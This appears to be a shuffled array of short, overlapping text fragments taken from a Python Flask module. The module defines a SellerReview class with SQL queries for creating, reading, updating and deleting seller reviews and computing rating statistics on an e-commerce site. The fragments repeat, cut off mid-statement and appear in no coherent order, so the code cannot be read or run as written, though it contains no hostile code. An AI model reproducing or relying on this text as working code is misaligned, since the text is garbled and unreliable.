"create the object if rows: reviews = [SellerReview(user_id = row[0], seller_id = row[1],",
"This means that user has not bought from this seller if not rows:",
"is None or user_id is None: return reviews else: return reviews[0] # Otherwise,",
"Reviews of Sellers # CREATE TABLE SellerReview ( # user_id INT NOT NULL",
"return 'you have already made a review for this seller' return 'Done' @staticmethod",
"ID: ' + seller_id @staticmethod def get_review_stats(user_id): rows = app.db.execute(''' SELECT user_id, COUNT(*)",
"a check to see if the user has bought from this seller rows",
"date_time, user_id = current_user.id, seller_id = seller_id) return 'Done' @staticmethod def delete_review(seller_id): rows",
"= date_time, user_id = current_user.id, seller_id = seller_id) return 'Done' @staticmethod def delete_review(seller_id):",
"redirect, render_template, request, url_for from flask_login import current_user from sqlalchemy import exc import",
"'Complete' ''', buyer_id = current_user.id, seller_id = seller_id) # This means that user",
"add to review date_time = datetime.datetime.now().strftime(\"%Y-%m-%dT%H:%M:%SZ\") description = request.form['body'] rating = request.form['numstars'] rows",
"(user_id, seller_id) # FOREIGN KEY (user_id, seller_id) REFERENCES Purchases(uid, pid) # ); class",
"rating = rating, description = description, date_time = date_time, user_id = current_user.id, seller_id",
"Purchases(uid, pid) # ); class SellerReview: def __init__(self, **kwargs): self.user_id = kwargs.get('user_id') self.seller_id",
"made a review for this seller' return 'Done' @staticmethod def update_review(request, seller_id): #",
"description, rating) VALUES(:user_id, :seller_id, :date_time, :description, :rating) RETURNING user_id \"\"\", user_id = current_user.id,",
"passed in `user_id`, then return all reviews for that seller if user_id is",
"seller_id = None): # If no passed in `user_id`, then return all reviews",
"<gh_stars>0 from flask import current_app as app, flash, redirect, render_template, request, url_for from",
"seller_id = :seller_id AND status = 'Complete' ''', buyer_id = current_user.id, seller_id =",
"not bought from this seller if not rows: return 'you have not had",
"); class SellerReview: def __init__(self, **kwargs): self.user_id = kwargs.get('user_id') self.seller_id = kwargs.get('seller_id') self.date_time",
"description, rating FROM SellerReview WHERE user_id = :user_id AND seller_id = :seller_id LIMIT",
"that user has not bought from this seller if not rows: return 'you",
"WHERE user_id = :user_id AND seller_id = :seller_id LIMIT 10 OFFSET :offset ''',",
":date_time WHERE user_id = :user_id AND seller_id = :seller_id RETURNING user_id \"\"\", rating",
"= kwargs.get('user_id') self.seller_id = kwargs.get('seller_id') self.date_time = kwargs.get('date_time') self.description = kwargs.get('description', '') self.rating",
"in `seller_id`, then return all reviews from that user elif seller_id is None:",
"FROM SellerReview WHERE user_id = :user_id GROUP BY user_id ''', user_id = user_id)",
"**kwargs): self.user_id = kwargs.get('user_id') self.seller_id = kwargs.get('seller_id') self.date_time = kwargs.get('date_time') self.description = kwargs.get('description',",
"rating = request.form['numstars'] try: rows = app.db.execute(\"\"\" INSERT INTO SellerReview(user_id, seller_id, date_time, description,",
"rows = app.db.execute(''' SELECT order_id FROM Purchases WHERE buyer_id = :buyer_id AND seller_id",
"a previous review, create the object if rows: reviews = [SellerReview(user_id = row[0],",
"seller_id) return 'Done' @staticmethod def delete_review(seller_id): rows = app.db.execute(\"\"\" DELETE FROM SellerReview WHERE",
"datetime.datetime.now().strftime(\"%Y-%m-%dT%H:%M:%SZ\") description = request.form['body'] rating = request.form['numstars'] try: rows = app.db.execute(\"\"\" INSERT INTO",
"have already made a review for this seller' return 'Done' @staticmethod def update_review(request,",
"the list if seller_id is None or user_id is None: return reviews else:",
"self.last_review = kwargs.get('last_review') self.avg_rating = kwargs.get('avg_rating') @staticmethod def get(user_id, offset = 0, seller_id",
"CHECK(rating >= 1 AND rating <= 5), # PRIMARY KEY (user_id, seller_id) #",
"SELECT user_id, COUNT(*) AS reviews, MAX(date_time) AS last_review, AVG(rating) AS avg_rating FROM SellerReview",
"rating FROM SellerReview WHERE seller_id = :seller_id ORDER BY date_time DESC LIMIT 10",
":description, :rating) RETURNING user_id \"\"\", user_id = current_user.id, seller_id = seller_id, date_time =",
"date_time, description, rating FROM SellerReview WHERE seller_id = :seller_id ORDER BY date_time DESC",
"= kwargs.get('exists') self.reviews = kwargs.get('reviews') self.last_review = kwargs.get('last_review') self.avg_rating = kwargs.get('avg_rating') @staticmethod def",
"order_id FROM Purchases WHERE buyer_id = :buyer_id AND seller_id = :seller_id AND status",
"# If no passed in `user_id`, then return all reviews for that seller",
"row[4], exists = True) for row in rows] # If no seller_id passed",
"kwargs.get('date_time') self.description = kwargs.get('description', '') self.rating = kwargs.get('rating') self.exists = kwargs.get('exists') self.reviews =",
"'Done' @staticmethod def update_review(request, seller_id): # Get information to add to review date_time",
"''', user_id = user_id) # If there exists a previous review, create the",
"self.exists = kwargs.get('exists') self.reviews = kwargs.get('reviews') self.last_review = kwargs.get('last_review') self.avg_rating = kwargs.get('avg_rating') @staticmethod",
"= offset, seller_id = seller_id) # If there exists a previous review, create",
"date_time DESC LIMIT 10 OFFSET :offset ''', user_id = user_id, offset = offset)",
"ID: ' + product_id) return 'Deleted seller review for seller ID: ' +",
"= kwargs.get('description', '') self.rating = kwargs.get('rating') self.exists = kwargs.get('exists') self.reviews = kwargs.get('reviews') self.last_review",
"user_id ''', user_id = user_id) # If there exists a previous review, create",
"= seller_id) # flash('Deleted product review for product ID: ' + product_id) return",
"= seller_id) # This means that user has not bought from this seller",
"an empty SellerReview object else: return(SellerReview(exists = False)) @staticmethod def add_review(request, seller_id): #",
"user_id, seller_id, date_time, description, rating FROM SellerReview WHERE user_id = :user_id ORDER BY",
"app, flash, redirect, render_template, request, url_for from flask_login import current_user from sqlalchemy import",
"= kwargs.get('avg_rating') @staticmethod def get(user_id, offset = 0, seller_id = None): # If",
"UPDATE SellerReview SET rating = :rating, description = :description, date_time = :date_time WHERE",
"NOT NULL REFERENCES Sellers(id), # date_time DATE NOT NULL, # description VARCHAR(256) NOT",
"seller' return 'Done' @staticmethod def update_review(request, seller_id): # Get information to add to",
"= datetime.datetime.now().strftime(\"%Y-%m-%dT%H:%M:%SZ\") description = request.form['body'] rating = request.form['numstars'] try: rows = app.db.execute(\"\"\" INSERT",
"None or user_id is None: return reviews else: return reviews[0] # Otherwise, create",
"rating, description = description, date_time = date_time, user_id = current_user.id, seller_id = seller_id)",
"def update_review(request, seller_id): # Get information to add to review date_time = datetime.datetime.now().strftime(\"%Y-%m-%dT%H:%M:%SZ\")",
"this user except exc.IntegrityError as e: return 'you have already made a review",
"= :description, date_time = :date_time WHERE user_id = :user_id AND seller_id = :seller_id",
"= user_id, offset = offset, seller_id = seller_id) # If there exists a",
"@staticmethod def get(user_id, offset = 0, seller_id = None): # If no passed",
"user_id, offset = offset) # If `seller_id` passed in, then return review from",
"seller_id = seller_id, offset = offset) # If no passed in `seller_id`, then",
"status = 'Complete' ''', buyer_id = current_user.id, seller_id = seller_id) # This means",
"user_id = :user_id GROUP BY user_id ''', user_id = user_id) # If there",
":buyer_id AND seller_id = :seller_id AND status = 'Complete' ''', buyer_id = current_user.id,",
"= current_user.id, seller_id = seller_id) # This means that user has not bought",
"then return review from that user for the given seller elif seller_id is",
":user_id GROUP BY user_id ''', user_id = user_id) # If there exists a",
"REFERENCES Purchases(uid, pid) # ); class SellerReview: def __init__(self, **kwargs): self.user_id = kwargs.get('user_id')",
"INT NOT NULL REFERENCES Sellers(id), # date_time DATE NOT NULL, # description VARCHAR(256)",
"BY date_time DESC LIMIT 10 OFFSET :offset ''', user_id = user_id, offset =",
"Get information to add to review date_time = datetime.datetime.now().strftime(\"%Y-%m-%dT%H:%M:%SZ\") description = request.form['body'] rating",
"user_id = current_user.id, seller_id = seller_id, date_time = date_time, description = description, rating",
"DATE NOT NULL, # description VARCHAR(256) NOT NULL, # rating DECIMAL(10, 2) NOT",
"seller_id) # FOREIGN KEY (user_id, seller_id) REFERENCES Purchases(uid, pid) # ); class SellerReview:",
"seller_id = :seller_id LIMIT 10 OFFSET :offset ''', user_id = user_id, offset =",
"user elif seller_id is None: rows = app.db.execute(''' SELECT user_id, seller_id, date_time, description,",
"return just the first element, not the list if seller_id is None or",
"If no passed in `user_id`, then return all reviews for that seller if",
"flask_login import current_user from sqlalchemy import exc import datetime # Reviews of Sellers",
"'you have already made a review for this seller' return 'Done' @staticmethod def",
"render_template, request, url_for from flask_login import current_user from sqlalchemy import exc import datetime",
"description = :description, date_time = :date_time WHERE user_id = :user_id AND seller_id =",
"if user_id is None: rows = app.db.execute(''' SELECT user_id, seller_id, date_time, description, rating",
"means already a review for this seller from this user except exc.IntegrityError as",
"seller_id @staticmethod def get_review_stats(user_id): rows = app.db.execute(''' SELECT user_id, COUNT(*) AS reviews, MAX(date_time)",
"'you have not had a completed purchase from this seller' # Get information",
"VALUES(:user_id, :seller_id, :date_time, :description, :rating) RETURNING user_id \"\"\", user_id = current_user.id, seller_id =",
"review date_time = datetime.datetime.now().strftime(\"%Y-%m-%dT%H:%M:%SZ\") description = request.form['body'] rating = request.form['numstars'] rows = app.db.execute(\"\"\"",
"SellerReview WHERE seller_id = :seller_id ORDER BY date_time DESC LIMIT 10 OFFSET :offset",
"= seller_id) return 'Done' @staticmethod def delete_review(seller_id): rows = app.db.execute(\"\"\" DELETE FROM SellerReview",
"row[1], last_review = row[2], avg_rating = row[3], exists = True) for row in",
"# PRIMARY KEY (user_id, seller_id) # FOREIGN KEY (user_id, seller_id) REFERENCES Purchases(uid, pid)",
"BY date_time DESC LIMIT 10 OFFSET :offset ''', seller_id = seller_id, offset =",
"offset, seller_id = seller_id) # If there exists a previous review, create the",
"seller_id is not None: rows = app.db.execute(''' SELECT user_id, seller_id, date_time, description, rating",
"the object if rows: return [SellerReview(user_id = row[0], reviews = row[1], last_review =",
"= :date_time WHERE user_id = :user_id AND seller_id = :seller_id RETURNING user_id \"\"\",",
"import datetime # Reviews of Sellers # CREATE TABLE SellerReview ( # user_id",
"seller_id, date_time, description, rating FROM SellerReview WHERE seller_id = :seller_id ORDER BY date_time",
"'Deleted seller review for seller ID: ' + seller_id @staticmethod def get_review_stats(user_id): rows",
"review for this seller' return 'Done' @staticmethod def update_review(request, seller_id): # Get information",
"review for product ID: ' + product_id) return 'Deleted seller review for seller",
"request.form['body'] rating = request.form['numstars'] rows = app.db.execute(\"\"\" UPDATE SellerReview SET rating = :rating,",
"seller_id = seller_id) return 'Done' @staticmethod def delete_review(seller_id): rows = app.db.execute(\"\"\" DELETE FROM",
"return [SellerReview(user_id = row[0], reviews = row[1], last_review = row[2], avg_rating = row[3],",
"url_for from flask_login import current_user from sqlalchemy import exc import datetime # Reviews",
"if rows: reviews = [SellerReview(user_id = row[0], seller_id = row[1], date_time = row[2],",
"= app.db.execute(\"\"\" UPDATE SellerReview SET rating = :rating, description = :description, date_time =",
"return 'you have not had a completed purchase from this seller' # Get",
"create the object if rows: return [SellerReview(user_id = row[0], reviews = row[1], last_review",
"if rows: return [SellerReview(user_id = row[0], reviews = row[1], last_review = row[2], avg_rating",
"given seller elif seller_id is not None: rows = app.db.execute(''' SELECT user_id, seller_id,",
"date_time = datetime.datetime.now().strftime(\"%Y-%m-%dT%H:%M:%SZ\") description = request.form['body'] rating = request.form['numstars'] try: rows = app.db.execute(\"\"\"",
"description, rating FROM SellerReview WHERE user_id = :user_id ORDER BY date_time DESC LIMIT",
"is None: return reviews else: return reviews[0] # Otherwise, create an empty SellerReview",
"request.form['numstars'] try: rows = app.db.execute(\"\"\" INSERT INTO SellerReview(user_id, seller_id, date_time, description, rating) VALUES(:user_id,",
"= current_user.id, seller_id = seller_id) # flash('Deleted product review for product ID: '",
"for that seller if user_id is None: rows = app.db.execute(''' SELECT user_id, seller_id,",
"rows = app.db.execute(\"\"\" UPDATE SellerReview SET rating = :rating, description = :description, date_time",
"this seller rows = app.db.execute(''' SELECT order_id FROM Purchases WHERE buyer_id = :buyer_id",
"user_id \"\"\", user_id = current_user.id, seller_id = seller_id) # flash('Deleted product review for",
"= date_time, description = description, rating = rating) # This means already a",
"None: return reviews else: return reviews[0] # Otherwise, create an empty SellerReview object",
"date_time = :date_time WHERE user_id = :user_id AND seller_id = :seller_id RETURNING user_id",
"app.db.execute(\"\"\" DELETE FROM SellerReview WHERE user_id = :user_id AND seller_id = :seller_id RETURNING",
"to add to review date_time = datetime.datetime.now().strftime(\"%Y-%m-%dT%H:%M:%SZ\") description = request.form['body'] rating = request.form['numstars']",
"= row[0], seller_id = row[1], date_time = row[2], description = row[3], rating =",
"description = description, rating = rating) # This means already a review for",
"seller_id) # flash('Deleted product review for product ID: ' + product_id) return 'Deleted",
"= 0, seller_id = None): # If no passed in `user_id`, then return",
"= None): # If no passed in `user_id`, then return all reviews for",
"current_user.id, seller_id = seller_id, date_time = date_time, description = description, rating = rating)",
"REFERENCES Users(id), # seller_id INT NOT NULL REFERENCES Sellers(id), # date_time DATE NOT",
"class SellerReview: def __init__(self, **kwargs): self.user_id = kwargs.get('user_id') self.seller_id = kwargs.get('seller_id') self.date_time =",
"VARCHAR(256) NOT NULL, # rating DECIMAL(10, 2) NOT NULL CHECK(rating >= 1 AND",
"from sqlalchemy import exc import datetime # Reviews of Sellers # CREATE TABLE",
"sqlalchemy import exc import datetime # Reviews of Sellers # CREATE TABLE SellerReview",
":seller_id LIMIT 10 OFFSET :offset ''', user_id = user_id, offset = offset, seller_id",
"completed purchase from this seller' # Get information to add to review date_time",
"list if seller_id is None or user_id is None: return reviews else: return",
"no passed in `user_id`, then return all reviews for that seller if user_id",
"= True) for row in rows] # If no seller_id passed in, return",
"to see if the user has bought from this seller rows = app.db.execute('''",
"add_review(request, seller_id): # Add in a check to see if the user has",
"' + product_id) return 'Deleted seller review for seller ID: ' + seller_id",
"object else: return(SellerReview(exists = False)) @staticmethod def add_review(request, seller_id): # Add in a",
"AND seller_id = :seller_id RETURNING user_id \"\"\", rating = rating, description = description,",
"date_time = date_time, user_id = current_user.id, seller_id = seller_id) return 'Done' @staticmethod def",
":description, date_time = :date_time WHERE user_id = :user_id AND seller_id = :seller_id RETURNING",
"product review for product ID: ' + product_id) return 'Deleted seller review for",
"seller_id = :seller_id RETURNING user_id \"\"\", user_id = current_user.id, seller_id = seller_id) #",
"rows = app.db.execute(''' SELECT user_id, seller_id, date_time, description, rating FROM SellerReview WHERE seller_id",
"else: return(SellerReview(exists = False)) @staticmethod def add_review(request, seller_id): # Add in a check",
"for this seller' return 'Done' @staticmethod def update_review(request, seller_id): # Get information to",
"date_time, description, rating FROM SellerReview WHERE user_id = :user_id ORDER BY date_time DESC",
"# If no passed in `seller_id`, then return all reviews from that user",
"NULL, # rating DECIMAL(10, 2) NOT NULL CHECK(rating >= 1 AND rating <=",
"reviews[0] # Otherwise, create an empty SellerReview object else: return(SellerReview(exists = False)) @staticmethod",
"\"\"\", user_id = current_user.id, seller_id = seller_id) # flash('Deleted product review for product",
"= kwargs.get('rating') self.exists = kwargs.get('exists') self.reviews = kwargs.get('reviews') self.last_review = kwargs.get('last_review') self.avg_rating =",
"False)) @staticmethod def add_review(request, seller_id): # Add in a check to see if",
"seller from this user except exc.IntegrityError as e: return 'you have already made",
"user_id, offset = offset, seller_id = seller_id) # If there exists a previous",
"if seller_id is None or user_id is None: return reviews else: return reviews[0]",
"AND seller_id = :seller_id RETURNING user_id \"\"\", user_id = current_user.id, seller_id = seller_id)",
"rows: reviews = [SellerReview(user_id = row[0], seller_id = row[1], date_time = row[2], description",
"reviews = row[1], last_review = row[2], avg_rating = row[3], exists = True) for",
"offset = offset) # If `seller_id` passed in, then return review from that",
"SellerReview WHERE user_id = :user_id AND seller_id = :seller_id RETURNING user_id \"\"\", user_id"
] |
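# A minimal usage sketch (not part of the original module), assuming a Flask
# `app` with the same `app.db` helper used above; the route, view function,
# and template name are hypothetical.
@app.route('/seller/<int:seller_id>/reviews', methods=['GET', 'POST'])
def seller_reviews(seller_id):
    if request.method == 'POST':
        # add_review returns 'Done' on success or a human-readable refusal.
        flash(SellerReview.add_review(request, seller_id))
    # user_id=None fetches the ten most recent reviews for this seller as a
    # list, per the branching in SellerReview.get above.
    reviews = SellerReview.get(None, offset=0, seller_id=seller_id)
    return render_template('seller_reviews.html', reviews=reviews)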
# Pylons controller serving workspace file downloads (kwmo).
import logging
import simplejson
import time
from pylons import request, response, session, config, tmpl_context as c
from pylons.controllers.util import abort, redirect_to
from kwmo.lib.base import BaseController, render
from kfs_lib import *
from kwmo.lib.file_download import kfs_download_generator
from kwmo.model.kfs_node import KfsNode
from kwmo.lib.kwmo_kcd_client import KcdClient
from kwmo.lib.config import get_cached_kcd_external_conf_object

log = logging.getLogger(__name__)

class FileDownloadController(BaseController):
    requires_auth = ['download']

    # Send download notifications.
    send_notification = True

    # Download a file.
    def download(self, workspace_id):
        workspace_id = int(workspace_id)

        # Shortcuts
        share_id = 0
        user_id = session['user']['id']
        kcd_conf = get_cached_kcd_external_conf_object()

        # Permissions verification
        if not c.perms.hasPerm('kfs.download.share.%i' % (share_id)):
            log.error("File download denied: user does not have the right permissions.")
            # FIXME download permission error: get rid of the 403 error; send an error file?
            return abort(403)

        # Get the kfs_file object from the request.
        web_kfs_file_json = request.params.get('kfs_file')
        web_kfs_file_dict = simplejson.loads(web_kfs_file_json)
        web_kfs_file = WebKFSFile().from_dict(web_kfs_file_dict)
        assert web_kfs_file.workspace_id == workspace_id
        assert web_kfs_file.share_id == share_id

        # Get the kfs node associated with it.
        kfs_node = KfsNode.get_by(workspace_id=workspace_id,
                                  share_id=web_kfs_file.share_id,
                                  inode_id=web_kfs_file.inode_id)

        if c.workspace.public and not c.is_admin:
            # Check that the user has the right to download from this path.
            kfs_dir = kfs_node.parent
            if not kfs_dir:
                raise Exception("Public workspace file download: bad directory(0).")
            if kfs_dir.name == "Original attachments":
                kfs_dir = kfs_dir.parent
            expected_dir_name = get_kfs_skurl_subject(session['email_info']['date'],
                                                      session['email_info']['subject'])
            if kfs_dir.name != expected_dir_name:
                raise Exception("Public workspace file download: bad directory(1).")
            kfs_dir_parent = kfs_dir.parent
            if not kfs_dir_parent:
                raise Exception("Public workspace file download: bad directory(2).")
            if kfs_dir_parent.parent_inode_id != KFS_ROOT_INODE_ID:
                raise Exception("Public workspace file download: bad directory(3).")
            identities_emails = map(lambda x: x['email'], session['identities'])
            if kfs_dir_parent.name not in identities_emails:
                raise Exception("Public workspace file download: bad directory(4).")

        # Get the download mode.
        mode = request.params.get('mode', 'save')
        ctype = None
        if mode == 'open':
            # Guess the mime type when opening in the browser.
            import mimetypes
            ctype, cencoding = mimetypes.guess_type(kfs_node.name, False) # not strict
            #ctype, cencoding = mimetypes.guess_type(kfs_node.name, True) # strict
        if not ctype:
            # Fall back to the generic download mime type.
            ctype, cencoding = ('application/octet-stream', None)

        kfs_files = [kfs_node.to_dict()]

        # Set the content type and the headers.
        response.headers['Content-Type'] = ctype
        #if cencoding:
        #    response.headers['Content-Encoding'] = cencoding
        response.headers['Content-disposition'] = \
            str('attachment; filename="%s"' % (kfs_node.name.encode('latin1')))
        response.headers['Content-Transfer-Encoding'] = 'binary'

        # Use a custom header that will be replaced in a middleware (workaround
        # for the Content-Length header being dropped somewhere in pylons).
        response.headers['X-Content-Length'] = str(kfs_node.file_size)

        # These headers are necessary for the download to work on IE.
        response.headers['Cache-Control'] = 'maxage=3600'
        response.headers['Pragma'] = 'public'

        if self.send_notification:
            # Send a download notification to KCD.
            pubws_email_id = 0
            if c.workspace.public:
                pubws_email_id = session['email_id']
            kc = KcdClient(kcd_conf)
            try:
                kc.send_download_notification(workspace_id, user_id,
                                              kfs_node.share_id, kfs_node.inode_id,
                                              kfs_node.commit_id, pubws_email_id)
                log.debug(("Sent download notification: workspace_id=%i, user_id=%i, share_id=%i"
                           ", inode_id=%i, commit_id=%i, pubws_email_id=%i.")
                          % (workspace_id, user_id, kfs_node.share_id,
                             kfs_node.inode_id, kfs_node.commit_id, pubws_email_id))
            except Exception, e:
                log.error("Sending download notification failed: '%s'." % (str(e)))
        else:
            log.debug("Not sending download notification: user is admin: "
                      "workspace_id=%i, user_id=%i." % (workspace_id, user_id))

        return kfs_download_generator(kcd_conf, kfs_node.workspace_id,
                                      kfs_node.share_id, user_id, kfs_files)
"pubws_email_id) log.debug((\"Sent download notification: workspace_id=%i, user_id=%i, share_id=%i\" + \\ \", inode_id=%i, commit_id=%i, pubws_email_id=%i.\")",
"headers. response.headers['Content-Type'] = ctype #if cencoding: # response.headers['Content-Encoding'] = cencoding response.headers['Content-disposition'] = str('attachment;",
"get_cached_kcd_external_conf_object() # Permissions verification if not c.perms.hasPerm('kfs.download.share.%i' % (share_id)): log.error(\"File download denied: user",
"user has rights to download from this path. kfs_dir = kfs_node.parent if not",
"= KcdClient(kcd_conf) try: kc.send_download_notification(workspace_id, user_id, kfs_node.share_id, kfs_node.inode_id, kfs_node.commit_id, pubws_email_id) log.debug((\"Sent download notification: workspace_id=%i,",
"try: kc.send_download_notification(workspace_id, user_id, kfs_node.share_id, kfs_node.inode_id, kfs_node.commit_id, pubws_email_id) log.debug((\"Sent download notification: workspace_id=%i, user_id=%i, share_id=%i\"",
"# the Content-Length header being dropped somewhere in pylons). response.headers['X-Content-Length'] = str(kfs_node.file_size) #",
"from kwmo.lib.base import BaseController, render from kfs_lib import * from kwmo.lib.file_download import kfs_download_generator",
"not strict #ctype, cencoding = mimetypes.guess_type(kfs_node.name, True) # strict if not ctype: #",
"tmpl_context as c from pylons.controllers.util import abort, redirect_to from kwmo.lib.base import BaseController, render",
"= None if mode == 'open': # Guest mime type import mimetypes ctype,",
"to work on IE. response.headers['Cache-Control'] = 'maxage=3600' response.headers['Pragma'] = 'public' if self.send_notification: #",
"= session['email_id'] kc = KcdClient(kcd_conf) try: kc.send_download_notification(workspace_id, user_id, kfs_node.share_id, kfs_node.inode_id, kfs_node.commit_id, pubws_email_id) log.debug((\"Sent",
"log.debug((\"Sent download notification: workspace_id=%i, user_id=%i, share_id=%i\" + \\ \", inode_id=%i, commit_id=%i, pubws_email_id=%i.\") %",
"kfs_dir_parent.name not in identities_emails: raise Exception(\"Public workspace file download: bad directory(4).\"); # Get",
"c from pylons.controllers.util import abort, redirect_to from kwmo.lib.base import BaseController, render from kfs_lib",
"= logging.getLogger(__name__) class FileDownloadController(BaseController): requires_auth = ['download'] # Send download notifications. send_notification =",
"type ctype, cencoding = ('application/octet-stream', None) kfs_files = [kfs_node.to_dict()] # Set the content",
"Exception(\"Public workspace file download: bad directory(0).\") if kfs_dir.name == \"Original attachments\": kfs_dir =",
"download: bad directory(4).\"); # Get download mode. mode = request.params.get('mode', 'save') ctype =",
"from kwmo.lib.kwmo_kcd_client import KcdClient from kwmo.lib.config import get_cached_kcd_external_conf_object log = logging.getLogger(__name__) class FileDownloadController(BaseController):",
"c.workspace.public and not c.is_admin: # Check that the user has rights to download",
"to download from this path. kfs_dir = kfs_node.parent if not kfs_dir: raise Exception(\"Public",
"render from kfs_lib import * from kwmo.lib.file_download import kfs_download_generator from kwmo.model.kfs_node import KfsNode",
"identities_emails = map(lambda x: x['email'], session['identities']) if kfs_dir_parent.name not in identities_emails: raise Exception(\"Public",
"it. kfs_node = KfsNode.get_by(workspace_id=workspace_id, share_id=web_kfs_file.share_id, inode_id=web_kfs_file.inode_id) if c.workspace.public and not c.is_admin: # Check",
"response.headers['Content-Type'] = ctype #if cencoding: # response.headers['Content-Encoding'] = cencoding response.headers['Content-disposition'] = str('attachment; filename=\"%s\"'",
"denied: user has not the right permissions.\") # FIXME download permission error: get",
"% ( str(e) ) ) else: log.debug(\"Not sending download notification: user is admin:",
"associted to it. kfs_node = KfsNode.get_by(workspace_id=workspace_id, share_id=web_kfs_file.share_id, inode_id=web_kfs_file.inode_id) if c.workspace.public and not c.is_admin:",
")) response.headers['Content-Transfer-Encoding'] = 'binary' # Use a custom header that will be replaced",
"from request. web_kfs_file_json = request.params.get('kfs_file') web_kfs_file_dict = simplejson.loads(web_kfs_file_json) web_kfs_file = WebKFSFile().from_dict(web_kfs_file_dict) assert web_kfs_file.workspace_id",
"kfs_dir = kfs_dir.parent expected_dir_name = get_kfs_skurl_subject(session['email_info']['date'], session['email_info']['subject']) if kfs_dir.name != expected_dir_name: raise Exception(\"Public",
"has not the right permissions.\") # FIXME download permission error: get rid of",
"bad directory(1).\") kfs_dir_parent = kfs_dir.parent if not kfs_dir_parent: raise Exception(\"Public workspace file download:",
"#ctype, cencoding = mimetypes.guess_type(kfs_node.name, True) # strict if not ctype: # Download mime",
"mime type ctype, cencoding = ('application/octet-stream', None) kfs_files = [kfs_node.to_dict()] # Set the",
"not in identities_emails: raise Exception(\"Public workspace file download: bad directory(4).\"); # Get download",
"= ctype #if cencoding: # response.headers['Content-Encoding'] = cencoding response.headers['Content-disposition'] = str('attachment; filename=\"%s\"' %",
"directory(1).\") kfs_dir_parent = kfs_dir.parent if not kfs_dir_parent: raise Exception(\"Public workspace file download: bad",
"dropped somewhere in pylons). response.headers['X-Content-Length'] = str(kfs_node.file_size) # These headers are necessary for",
"share_id # Get the kfs node associted to it. kfs_node = KfsNode.get_by(workspace_id=workspace_id, share_id=web_kfs_file.share_id,",
"middleware (workaround for # the Content-Length header being dropped somewhere in pylons). response.headers['X-Content-Length']",
"cencoding: # response.headers['Content-Encoding'] = cencoding response.headers['Content-disposition'] = str('attachment; filename=\"%s\"' % ( kfs_node.name.encode('latin1') ))",
"import get_cached_kcd_external_conf_object log = logging.getLogger(__name__) class FileDownloadController(BaseController): requires_auth = ['download'] # Send download",
"x: x['email'], session['identities']) if kfs_dir_parent.name not in identities_emails: raise Exception(\"Public workspace file download:",
"logging import simplejson import time from pylons import request, response, session,config, tmpl_context as",
"requires_auth = ['download'] # Send download notifications. send_notification = True # Download a",
"= get_cached_kcd_external_conf_object() # Permissions verification if not c.perms.hasPerm('kfs.download.share.%i' % (share_id)): log.error(\"File download denied:",
"if not kfs_dir: raise Exception(\"Public workspace file download: bad directory(0).\") if kfs_dir.name ==",
"True # Download a file. def download(self, workspace_id): workspace_id = int(workspace_id) # Shortcuts",
"except Exception, e: log.error(\"Sending download notification failed: '%s'.\" % ( str(e) ) )",
"request, response, session,config, tmpl_context as c from pylons.controllers.util import abort, redirect_to from kwmo.lib.base",
"Content-Length header being dropped somewhere in pylons). response.headers['X-Content-Length'] = str(kfs_node.file_size) # These headers",
"admin: workspace_id=%i, user_id=%i.\" % \\ ( workspace_id, user_id ) ) return kfs_download_generator(kcd_conf, kfs_node.workspace_id,",
"# Get the kfs node associted to it. kfs_node = KfsNode.get_by(workspace_id=workspace_id, share_id=web_kfs_file.share_id, inode_id=web_kfs_file.inode_id)",
"== share_id # Get the kfs node associted to it. kfs_node = KfsNode.get_by(workspace_id=workspace_id,",
"kfs_dir = kfs_node.parent if not kfs_dir: raise Exception(\"Public workspace file download: bad directory(0).\")",
"pubws_email_id = session['email_id'] kc = KcdClient(kcd_conf) try: kc.send_download_notification(workspace_id, user_id, kfs_node.share_id, kfs_node.inode_id, kfs_node.commit_id, pubws_email_id)",
"of 403 error: send an errror file? return abort(403) # Get kfs_file object",
"# not strict #ctype, cencoding = mimetypes.guess_type(kfs_node.name, True) # strict if not ctype:",
"assert web_kfs_file.share_id == share_id # Get the kfs node associted to it. kfs_node",
"if kfs_dir_parent.name not in identities_emails: raise Exception(\"Public workspace file download: bad directory(4).\"); #",
"response.headers['Cache-Control'] = 'maxage=3600' response.headers['Pragma'] = 'public' if self.send_notification: # Send download notification to",
"import logging import simplejson import time from pylons import request, response, session,config, tmpl_context",
"pubws_email_id = 0 if c.workspace.public: pubws_email_id = session['email_id'] kc = KcdClient(kcd_conf) try: kc.send_download_notification(workspace_id,",
"WebKFSFile().from_dict(web_kfs_file_dict) assert web_kfs_file.workspace_id == workspace_id assert web_kfs_file.share_id == share_id # Get the kfs",
"bad directory(2).\") if kfs_dir_parent.parent_inode_id != KFS_ROOT_INODE_ID: raise Exception(\"Public workspace file download: bad directory(3).\");",
"kfs_dir_parent = kfs_dir.parent if not kfs_dir_parent: raise Exception(\"Public workspace file download: bad directory(2).\")",
"KfsNode.get_by(workspace_id=workspace_id, share_id=web_kfs_file.share_id, inode_id=web_kfs_file.inode_id) if c.workspace.public and not c.is_admin: # Check that the user",
"'open': # Guest mime type import mimetypes ctype, cencoding = mimetypes.guess_type(kfs_node.name, False) #",
"= [kfs_node.to_dict()] # Set the content type and the headers. response.headers['Content-Type'] = ctype",
"and the headers. response.headers['Content-Type'] = ctype #if cencoding: # response.headers['Content-Encoding'] = cencoding response.headers['Content-disposition']",
"share_id=web_kfs_file.share_id, inode_id=web_kfs_file.inode_id) if c.workspace.public and not c.is_admin: # Check that the user has",
"raise Exception(\"Public workspace file download: bad directory(2).\") if kfs_dir_parent.parent_inode_id != KFS_ROOT_INODE_ID: raise Exception(\"Public",
"to KCD. pubws_email_id = 0 if c.workspace.public: pubws_email_id = session['email_id'] kc = KcdClient(kcd_conf)",
"in a middleware (workaround for # the Content-Length header being dropped somewhere in",
"response.headers['Content-disposition'] = str('attachment; filename=\"%s\"' % ( kfs_node.name.encode('latin1') )) response.headers['Content-Transfer-Encoding'] = 'binary' # Use",
"# These headers are necessary for the download to work on IE. response.headers['Cache-Control']",
"download notification failed: '%s'.\" % ( str(e) ) ) else: log.debug(\"Not sending download"
] |
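The controller above smuggles the file size through the custom X-Content-Length header because the regular Content-Length header gets dropped somewhere in the Pylons stack; a middleware is then expected to restore it on the way out. That middleware is not part of the fragments above. The following is a minimal WSGI sketch of what the restoration step could look like, assuming the middleware only needs to rename the header; the name ContentLengthFixMiddleware is illustrative, not taken from kwmo.

class ContentLengthFixMiddleware(object):
    """Copy X-Content-Length back into Content-Length just before the
    response leaves the WSGI server (hypothetical sketch, not kwmo's code)."""

    def __init__(self, app):
        self.app = app

    def __call__(self, environ, start_response):
        def fixed_start_response(status, headers, exc_info=None):
            fixed = []
            content_length = None
            for name, value in headers:
                if name.lower() == 'x-content-length':
                    content_length = value  # remember the real size
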